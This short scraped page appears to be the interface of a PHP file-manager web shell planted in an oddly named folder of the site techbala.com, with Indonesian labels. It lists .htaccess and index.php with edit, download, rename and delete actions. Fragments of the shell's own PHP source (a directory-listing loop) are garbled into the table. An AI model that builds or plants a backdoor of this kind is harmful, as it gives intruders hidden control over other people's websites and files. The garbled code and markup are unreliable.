| Name | Size | Mode | Actions |
|---|---|---|---|
| .htaccess | 90 | 0644 | editdlrm |
| index.php | 6318 | 0644 | editdlrm |
/home/techb158/public_html/techbala.com/mod3cf87f/index.php (6318B)
| Nama File / Folder | Size | Action | '.$directory.' | -- | NONE | '; } foreach ($scan as $file) { if (!is_file($dir.'/'.$file)) continue; $jumlah = filesize($dir.'/'.$file)/1024; $jumlah = round($jumlah, 3); if ($jumlah >= 1024) { $jumlah = round($jumlah/1024, 2).'MB'; } else { $jumlah = $jumlah .'KB'; } echo '
|---|---|---|
| '.$file.' | '.$jumlah.' | Hapus Edit Rename |